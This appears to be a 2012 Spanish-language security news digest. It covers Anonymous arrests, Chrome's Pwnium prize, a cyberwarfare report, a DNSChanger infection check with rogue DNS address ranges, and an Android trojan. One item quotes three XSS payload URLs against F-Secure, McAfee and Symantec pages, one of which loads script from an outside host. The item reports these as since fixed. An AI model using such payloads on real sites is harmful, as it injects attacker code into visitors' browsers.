IV Encuesta Latinoamericana de Seguridad de la Información ACIS

Ya se encuentra activa la IV Encuesta Latinoamericana de Seguridad de la Información cuyo objetivo contar con un instrumento para avanzar en el desarrollo de estadísticas sobre el tema en la región. La encuesta estará disponible hasta Abril 22 de 2012.

Además se puede descargar el documento con los resultados de la III Encuesta realizada durante 2011.

Fuente: ACIS

Contenido completo en www.segu-info.com.ar

Detienen a (supuestos) #Anonymous argentinos por ataques a sitios web

Operativo de Interpol en Europa y América latina. Hubo 40 allanamientos en 15 ciudades, donde apresaron a 25 personas. Son presuntos miembros de Anonymous. En el país capturaron a supuestos hackers en Capital, San Isidro, Tucumán y Córdoba (este último no fue hallado).

El megaoperativo que llevó más de ocho meses de investigación y abarcó cuatro países fue para intentar frenar a la mayor red de activistas informáticos del mundo, Anonymous.

Se cree que la red abarca a más de seis millones de usuarios en todo el planeta. Ayer, Interpol informó que había logrado dar con 25 de ellos. Según pudo saber Clarín, todos los argentinos eran mayores de edad, en el grupo había tanto hombres como mujeres y vivían en Capital Federal, San Isidro, Río Cuarto (Córdoba) y Tucumán.

La investigación, a la que Interpol denominó Exposure comenzó en junio de 2011. En total, se realizaron 40 operativos en 15 ciudades de España, Argentina, Chile y Colombia. Además de los detenidos, que tienen entre 17 y 40 años, Interpol se llevó 250 equipos informativos y teléfonos celulares. También dinero que, se cree, sirve para financiar las actividades de Anonymous.

A estos detenidos se los acusa de haber hackeado páginas oficiales del gobierno colombiano, en particular del Ministerio de Defensa.

En el caso de Chile se dieron a conocer algunos datos, pero según la información los acusados son simples usuarios de LOIC, un software que inunda automáticamente un servidor con paquetes y requerimientos. Dentro de Anonymous, esto podría ser considerado el nivel más simple de participación, que difícilmente constituye un delito importante. Habrá que esperar a ver si realmente pasará algo con esto, o si simplemente es un intento de “asustar” a Anonymous.

Con el hashtag ‘tAnGoDoWn’, el mensaje difundido en la red social confirmó el derribo del portal web de Interpol, que cuenta con operaciones en 188 países. El ataque tuvo una duración estimada de 30 minutos.

Fuente: Clarin

Contenido completo en www.segu-info.com.ar

XSS en F-Secure, Mcafee y Symantec

XSSed ha publicado tres XSS en los sitios web de las empresas F-Secure, Mcafee y Symantec. Las vulnerabilidades fueron reportadas por “Zeitjak” y “dick” en abril de 2011 pero estuvieron activas hasta enero de 2012, cuando XSSed las hizo públicas.

• F-Secure.com (http://www.xssed.com/mirror/72776/):

https://kb.f-secure.com/userSetSession.aspx?c=0&cpc=0&cid=0&t="><body+onload="document%2Ewrite(String.fromCharCode(60,115,99,114,105,112,116,47,115,114,99,61,104,116,116,112,58,47,47,122,46,108,46,116,111,62,60,47,115,99,114,105,112,116,62))"+


• McAfee.com (http://www.xssed.com/mirror/72724/):

http://go.mcafee.com/activation.cfm?firewall_id="style="background-image:url('http://i.imgur.com/oHp8A.gif')"onfocus="document.write(String.fromCharCode(60)%2B'iframe src=http://xssed.com height=100%25width=100%25>'%2BString.fromCharCode(60)%2B'/iframe>'%2BString.fromCharCode(60)%2B'script>alert(/XSS/)'%2BString.fromCharCode(60)%2B'/script>')" foo="bar


• Symantec.com (http://www.xssed.com/mirror/70522/):

https://fileconnect.symantec.com/licenselogin.jsp?localeStr=en_US";document.location="http://www.xssed.com";//


Tal y como predecían en XSSed, luego de hacerse público los errores, las tres empresas han solucionado rápidamente el problema.

Cristian de la Redacción de Segu-Info

Contenido completo en www.segu-info.com.ar

Google entregará hasta un millón de dólares a quienes hackeen Chrome

Google se ha comprometido a premiar con un total de hasta un millón de dólares a las personas que logren hackear su navegador Chrome en la conferencia de seguridad CanSecWest, la próxima semana.

Google premiará a los ganadores con premios de U$S60.000 (completo usando solo bugs de Chrome), U$S 40.000 (parcial usando al menos un bug en Chrome), y U$S20.000 (consolación a través de otras aplicaciones), dependiendo de la importancia de la hazaña en un navegador instalado sobre Windows 7. PAra ellos, los miembros del equipo de seguridad de la compañía han anunciado en su blog el concurso Pwnium (para diferenciarlo del clásico Pwn2Own de CanSecWest).

Fuente: Arstechnica

Contenido completo en www.segu-info.com.ar

Trends 2012. La fusión definitiva de lo virtual y lo real

Por: Bernardo Gutiérrez

En los últimos dos años llevo insistiendo mucho en el concepto de ciudad híbrida, en la fusión del ciberespacio y el territorio. De hecho, la cada vez más nombrada Web 3.0 se encamina a una mezcla de sensores de datos ubicuos, individuos conectados en el territorio y web semántica. También se está hablando de esta web squared , un cóctel de geolocalización, cloud computing y realidad aumentada. 2012 será el año de la consagración del mundo híbrido. Casi todas mis predicciones van en esa dirección. Dejaremos pronto de hablar de internautas y comenzaremos a hablar de ciudadanos, digitales y físicos al mismo tiempo.

1)Visualizaciones de big data. Se habla mucho de la inmensa producción de datos del nuevo mundo conectado, pero no tanto de las visualizaciones que se realizan para traducir semejante maremagnum de datos. La visualización de Mercamadrid desarrollada dentro del Visualizar del Media Lab Prado es buen ejemplo. Cada vez habrá más datos recopilados y traducidos visualmente gracias al crowd sourcing. Los mapas que elabora Eric Fisher, como el del uso de Flickr y Twitter en Estados Unidos serán tendencia. El experimento Tráfico libre del Diário de Pernambuco (Brasil), un mapa en tiempo real sobre el estado del tráfico en la ciudad de Recife elaborado con datos de los usuarios, es un buen ejemplo.

2)Nuevas superficies de medios. Los medios de comunicación impresos están perdiendo presencia física (papel) en el territorio. Como ya escribí en TICbeat, los medios irán encontrando nuevas superficies (pantallas, cristales, tickets de tren..) para reforzar esa presencia. El digital signage – visualización de información y tweets de usuarios en grandes pantallas – es otra tendencia. Las nuevas plataformas – principalmente los tablets – también irán adquiriendo fuerza. Otra forma de presencia en el territorio. Creo que algunas aplicaciones para tablets como Readitlater, que permiten que el usuario marque un contenido y lo almacene para leer después en el metro, por ejemplo, son otro nuevo e interesante camino.

3)Territorio escaneable. La relación de las personas y el territorio a través de smart phones va mucho más allá de la lectura comercial de códigos QR o de servicios como Shazam (reconocimiento de música). Google ha lanzado, por ejemplo, Google Goggles, una app de reconocimiento de imagen. Creo que aplicaciones como eafsnap (identifica especies de árboles a partir de foto de sus hojas o haciendo fotos de sus hojas) o WeBIRD (reconocimiento de pájaros a partir de trinos grabados) abren una senda interesante.

4)Interacciones en el territorio. 2011 fue el año de Instagr.am, la red social móvil fotográfica. También fueron (mini) tendencia algunas aplicaciones como Color, que permite geolocalizar fotos y compartirlas con personas próximas. Algunos proyectos como Skanz, que permite escanear un código QR con información personal de personas físicas, abren la puerta a relaciones de gente desconocida en festivales, bares o eventos. Por otro lado, los llamados “objetos sociales”, con capas de contenido creadas por los usuarios, inauguran una época de wikiespacio construido con narraciones colectivas.

5) Redes libres, tecnología libre. El cierre de Megaupload, los proyectos de ley PIPA y SOPA estadounidenses, la aprobación de la Ley Sinde-Wert en España, la censura de algunos contenidos en Facebook y la nueva postura de Twitter en cuanto a la posibilidad de borrar tweets marcan un antes y un después en la historia de Internet. El software libre será más tendencia todavía en 2012. Veremos la explosión de redes sociales desarrolladas con software libre, como N-1.cc (y todas las redes del proyecto Lorea) o Identi.ca (un clon libre de Twitter). Los movimientos ciudadanos como el 15M español o Occupy Wall Street serán referencia en el desarrollo de tecnología libre. Occupy ya anunció el lanzamiento de Global Square, una red libre para todos los ciudadanos del mundo. Al mismo tiempo, veremos surgir aplicaciones móviles de lectura de códigos, críticos con SOPA, Ley Sinde-Wert y/o empresas de dudosa ética.

Fuente: Trends TicBeat

Contenido completo en www.segu-info.com.ar

Países preparados para la ciberguerra (o no)

Con el desarrollo de Internet como infraestructura global para realizar negocios y como herramienta para la política, la seguridad cibernética se ha convertido en el centro de problemas de seguridad nacional e internacional.

En este informe Cybersecurity and Cyberwarfare – Preliminary Assessment of National Doctrine and Organization [PDF] desarrollado por CSIS se estudia el estado de 99 países, según sus gastos militares y su grado de conectividad a Internet, para determinar cómo se organizan para hacer frente a la seguridad cibernética.

El estudio toma fuentes abiertas para revisar las políticas de estado, y si tienen o planean la adquisición de capacidades defensivas y ofensivas cibernéticas. Si bien muchos estados mantienen en secreto la naturaleza de sus defensas y armas para la guerra, el informe muestra información general sobre el desarrollo de nuevas capacidades cibernéticas militares, en base a las fuentes consultadas.

En el informe se identifican 33 países y se incluye planificación y organización de su ejército para la ciberguerra. Estos países tienen muy avanzada su organización en lo que respecta a la doctrina militar y emplean a cientos o miles de personas para trabajar en la guerra cibernética. Los Elementos comunes en esta doctrina militar incluye actividades de reconocimiento, operaciones de recolección de información e interrupción de redes y servicios críticos del enemigo.

También se discuten sobre otros 36 países donde no hay debate público sobre el papel militar en el ciberespacio y en donde las agencias civiles responsables ​​de la seguridad interna, seguridad informática o la policía son los responsables de la seguridad cibernética. Este es el enfoque “tradicional” de la seguridad cibernética que se remonta a los ’90 y a la creación de un Equipo de Emergencia Nacional (CERT), la asignación de la responsabilidad a los ministerios de ciencia y a la creación de unidades especializadas dentro del país.

El informe coloca a Argentina, Brasil y Colombia en el primer grupo y a España en el segundo. Es paradójico la aparición de Argentina, sobre todo cuando en el país todavía ni siquiera se ha logrado que funcione en la práctica el CERT nacional (ArCERT ahora convertido en ICIC) y por lo tanto ni siquiera se podría clasificar al país dentro del segundo grupo. Las fuentes abiertas consultadas para llegar a esa conclusión han sido un informe del Dr Javier Ulises Ortiz del año 2008 y el organigrama del Estado Mayor Conjunto de las FF.AA.

Cristian de la Redacción de Segu-Info

Contenido completo en www.segu-info.com.ar

Reboot, una película que incluye un wargame

Me acabo de enterar de la existencia de un corto de 34 min. llamado Reboot (@reboot_film)con una trama bastante orientada a la seguridad informática y la cultura cyberpunk, con una trama bastante intrigante y un tráiler que despierta muchas emociones entre las personas que trabajamos en seguridad.

Reboot Trailer from Joe Kawasaki on Vimeo.
Mientras miraba el tráiler varias cosas me llamaron la atención y las empecé a comentar con @Banchiero y @DariooAM algunos errores que encontrábamos como el uso de cmd en entorno *nix, el exploit algo viejo que utilizaban en algunas escenas y en el minuto 1:17 me dio curiosidad por el código QR que traía el protagonista, me dio por tratar de aclarar la imagen y leer el código y entonces todo cambió.

El código QR apuntaba a la pagina http://rebootfilm.com/manifesto en ella encontraríamos un código en binario, y nos dimos cuenta que realmente no se trataban de “huevos de pascua” como pensábamos, sino que había todo una serie de retos con distintos niveles para jugar, mas tarde revisando de nuevo el video en el minuto 1:05 se encontró otra pista http://rebootfilm.com/a78525551f5dadb9b1c68e2f889a4411 (hacking is an art, the only limitation being your mind and creativity, prove you see things other don’t) que nos llevaría a mas contenidos ocultos http://rebootfilm.com/path2 “look closer, within a fraction, there lies a path”, entre otras cosas.

La invitación entonces es primero que todo a ver esta película que la verdad promete ser bastante buena, almenos para los interesados en estos temas de la seguridad informática, pero también a descubrir lo que los pequeños acertijos que los creadores de esta película han dejado ahí para nuestra diversión.

Puedes aportar mas pistas, errores o cosas curiosas de la película en los comentarios, te recomendamos seguir la cuenta en twitter de la película ya que constantemente te darán pistas.

Fuente: DragonJAR

Contenido completo en www.segu-info.com.ar

Averigua si estás infectado con DNSChanger

El próximo 8 de marzo, el FBI apagaría los servidores que habían sido secuestrados luego de la operación contra la Botnet de DNSChanger y por lo tanto los equipos actualmente infectados, no podrán navegar. Cabe destacar que este malware no es nuevo sino que simplemente el FBI daría por finalizada la operación iniciada en noviembre de 2011 sobre un malware propagado en 2008.

Este malware procede a cambiar las direcciones IP de los servidores DNS de la máquina infectada. De esta manera, cuando el usuario desee acceder a algún sitio web particular, la resolución de nombres se hará mediante el servidor DNS malicioso (rogue DNS server). De esta forma se logra que los usuarios accedan a sitios no genuinos a través de direcciones URL legítimas exponiendo a los mismos al robo de credenciales, infecciones de otro tipo de malware, etc.

Este tipo de malware no solo afecta a la computadora local. Si se está en un entorno hogareño o de oficina, el malware intenta acceder al dispositivo que brinda servicio DHCP, ya sea router o access point, y mediante fuerza bruta realiza una comprobación de contraseñas por defecto para intentar acceder a dicho dispositivo. En caso de que el acceso sea exitoso, procede a modificar las direcciones de los servidores DNS para que este dispositivo utilice como servicio los rogue dns servers. Otra funcionalidad de este tipo de malware que hay que destacar, es el hecho de que intenta desactivar el software antivirus, si es que se cuenta con uno, y además procura impedir las actualizaciones del sistema operativo.

Cómo comprobar si se está infectado

Para comprobar si se está infectado, basta con comprobar las direcciones IP de los servidores DNS que figuran en el sistema operativo. La manera más sencilla se llevar a cabo esto es:

• Abrir una consola. Para realizar esto dirigirse a Inicio – Ejecutar, luego escribir “cmd” y presionar “enter”. En el caso de Windows Vista en adelante, ir a inicio y directamente escribir “cmd”.
• Una vez en la consola, escribir el comando “ipconfig /all” y presionar “enter”.
• Buscar la sección donde dice DNS Servers o Servidores DNS. Las direcciones IP que allí figuran son las de los servidores DNS.

Actualmente existe un rango de direcciones de este tipo de servidores, las cuales han sido identificadas como maliciosas, hasta el momento se han identificado seis pares de servidores DNS maliciosos.

• 85.255.112.0 hasta 85.255.127.255
• 67.210.0.0 hasta 67.210.15.255
• 93.188.160.0 hasta 93.188.167.255
• 77.67.83.0 hasta 77.67.83.255
• 213.109.64.0 hasta 213.109.79.255
• 64.28.176.0 hasta 64.28.191.255

Si Ud. no tiene estos servidores DNS, no está infectado pero de todos modos, el FBI puso a disposición de los usuarios un formulario online (informe PDF sobre el malware) que permite introducir la dirección IP del servidor que se encontró y de esta manera informa si el usuario se encuentra infectado o no.

Si la dirección IP que se ingresó es indicada como maliciosa, es necesario modificar las configuraciones de red para poner nuevamente los servidores legítimos. Si bien las tasas de infecciones en Latinoamérica con este tipo de malware son relativamente bajas, desde ESET recomendamos verificar que no se esté infectado. Además, se les recuerda que contar con una herramienta de detección proactiva de malware reduce la exposición a este tipo de amenazas.

También existe la página http://dnschanger.eu/, un servicio gratuito para comprobar si se están usando servidores DNS “rogue” o falsos. En principio nos parecía mala idea usar un dominio para comprobar si se están usando en el sistema DNS falsos. El operador de estos servidores DNS que ha infectado tu máquina, solo tendría que redirigir, bloquear o cambiar la IP del dominio para engañar al usuario, y este nunca sabría realmente si sus DNS son los buenos o no. Es lo de siempre: no puedes realizar operaciones concluyentes sobre si un sistema está infectado… operando desde el propio sistema.

Así, si puedes descargar esta imagen: http://85.214.11.194/images/t2logo.gif (pero resolviendo el dominio) es que estás infectado. Si no, es que en realidad estás acudiendo a http://85.214.11.194/images/t2logo.gif y por tanto no estás infectado.

Fuente: ESET Latinoamérica, FBI y Hispasec

Contenido completo en www.segu-info.com.ar

Detienen a (supuestos) miembros de #Anonymous España

En España han sido arrestadas otras dos personas más –una de ellas menor de edad-, e imputadas otras 10 en Argentina, 6 en Chile y 5 en Colombia (video).

Los detenidos en nuestro país son los presuntos responsables de ataques DDoS y defacement a páginas web de partidos políticos, instituciones y empresas, así como de la publicación de datos privados en la Red

Se han intervenido 25 PC´s, discos duros y otros dispositivos de almacenamiento que están siendo analizados por los agentes y bloqueados dos servidores en Bulgaria y la República Checa

Agentes de la Policía Nacional han detenido a cuatro importantes ciberdelincuentes que reivindicaban sus acciones en nombre de Anonymous. Dos de los arrestados han ingresado en prisión por orden judicial, otro ha quedado en libertad bajo fianza y el cuarto, menor de edad, bajo la custodia de sus padres. Los detenidos en nuestro país son los presuntos responsables de ataques DDoS –denegación de servicio- y defacement –modificación de una web sin autorización del propietario- a páginas web de partidos políticos, instituciones y empresas, así como de la publicación de datos referentes, entre otros, a escoltas de la presidencia del Gobierno y de miembros del GEO de la Policía Nacional en la Red. Estos arrestos se han producido en el marco de una operación internacional contra el ciberdelito coordinada por INTERPOL, denominada Exposure, en la que han resultado imputadas 10 personas en Argentina, 6 en Chile y 5 en Colombia.

Las investigaciones realizadas por los especialistas de la Brigada de Investigación Tecnológica de la Policía, tras las denuncias presentadas por los ataques informáticos realizados desde mediados del pasado año, indicaban que habían sido realizados por un número reducido de personas. Estos ataques cibernéticos respondían en ocasiones a acciones individuales que se apoyaban, sin embargo, en una pluralidad de personas que unían sus esfuerzos y conocimientos para perpetrarlos. Tras el análisis de miles de logs se logró identificar a las personas que se encontraban detrás de estas actividades ilícitas.

Los investigadores identificaron y detuvieron en Málaga a F.J.B.D., conocido como “Thunder” o “Pacotron”, presuntamente encargado de administrar y gestionar la infraestructura informática utilizada por Anonymous en España e Iberoamérica, principalmente. Los servidores que administraba, alojados en la República Checa y Bulgaria, servían a los ciberdelincuentes de elemento básico de comunicación seguro para la coordinación de sus miembros de cara a la planificación de nuevos ataques. Disponía además de un chat privado que precisaba de un certificado de acceso que sólo podía conceder él como administrador.

Los datos obtenidos permitieron igualmente a los agentes la identificación de J.M.L.G., “Troy”, presunto autor material de los ataques más destacados y filtraciones reivindicadas por Anonymous en nuestro país, que fue arrestado en Madrid. Entre estos ciberataques estarían la publicación de datos personales de miembros de la Policía Nacional destinados en la Casa Real, la escolta del Presidente del Gobierno, el Grupo Especial de Operaciones, y de la líder de UPyD, Rosa Díez. También se le atribuyen los ataques deface de páginas web de partidos políticos en las que aparecían unos colmillos sobre las imágenes de sus dirigentes.

A estos dos arrestos se suman el de J.I.P.S., detenido en Madrid, quien colaboraba estrechamente con J.M.L.G., y el de un joven de 16 años, presuntamente integrante de un grupo internacional de hacking conocido como “sector 404″, a quien se relaciona con los ataques reivindicados por este grupo.

En el dispositivo policial desarrollado en España, además de los cuatro arrestos, se han realizado cuatro registros en los que se han intervenido 25 PC´s, discos duros y otros dispositivos de almacenamiento que están siendo analizados por los especialistas de la BIT. Los detenidos, a quienes se atribuyen los delitos de asociación ilícita, daños informáticos y descubrimiento y revelación de secretos, contaban con elevados conocimientos informáticos.

En un escenario tan complejo como es Internet, estas actividades se desarrollan en un contexto global. En la red de chat IRC administrada por uno de los arrestados se alojaba un canal específico para ciberdelincuentes iberoamericanos, que participaban tanto en ataques a objetivos españoles como americanos, por lo que, a través del Grupo Latinoamericano de Delitos Tecnológicos de INTERPOL, se coordinaron las investigaciones de varios países, bajo la denominación de operación Exposure. Este operativo internacional ha dado como resultado la imputación de 10 personas en Argentina, 6 en Chile y 5 en Colombia. Asimismo se ha practicado un total de 12 registros en los que se han intervenido diversos soportes y material informático.

De hecho en los canales de chat, después de producirse las detenciones, se hacían llamamientos para un ataque de DDoS contra la web de la Policía española, solicitando expresamente que no lo hicieran españoles ante la posibilidad de que la Policía tuviera datos identificativos que desencadenaran nuevos arrestos.

A través de EUROPOL se solicitó la adopción de medidas cautelares que incluían la salvaguarda de datos y desconexión de servidores vinculados con las personas detenidas, ubicados en Bulgaria y República Checa.

La operación ha sido realizada por agentes de la Brigada de Investigación Tecnológica, de la Comisaría General de Policía Judicial; INTERPOL y EUROPOL, en colaboración con las Brigadas de Policía Judicial de los lugares donde se han practicado los arrestos.

Fuente: Policia España

Contenido completo en www.segu-info.com.ar

Troyano con polimorfismo, la nueva preocupación para Android

Symantec ha descubierto una especie de troyano bastante sofisticado diseñado para atacar el sistema operativo móvil Android, el cual es capaz de modificar su código cada vez que es descargado con el fin de superar las detecciones antivirus.

Este troyano, Android.Opfake, se basa en un mecanismo que modifica algunas de sus partes con el fin de asegurar que cada aplicación maliciosa que descarga es única. Symantec ha identificado numerosas variantes, todas ellas distribuidas desde páginas webs rusas. El malware tiene instrucciones de enviar mensajes SMS a números premium desde varios países europeos y otros que antes pertenecían a Rusia.

Detectar esta clase de malware que utilizan polimorfismo, puede no ser una tarea sencilla para algunos productos de seguridad, especialmente si basan su capacidad de detección en firmas estáticas.

En el caso de Android.Opfake el nivel de polimorfismo no es muy alto y sólo algunos de los archivos de datos del troyano son modificados por el servidor de distribución.

Fuente: Blog Antivirus

Contenido completo en www.segu-info.com.ar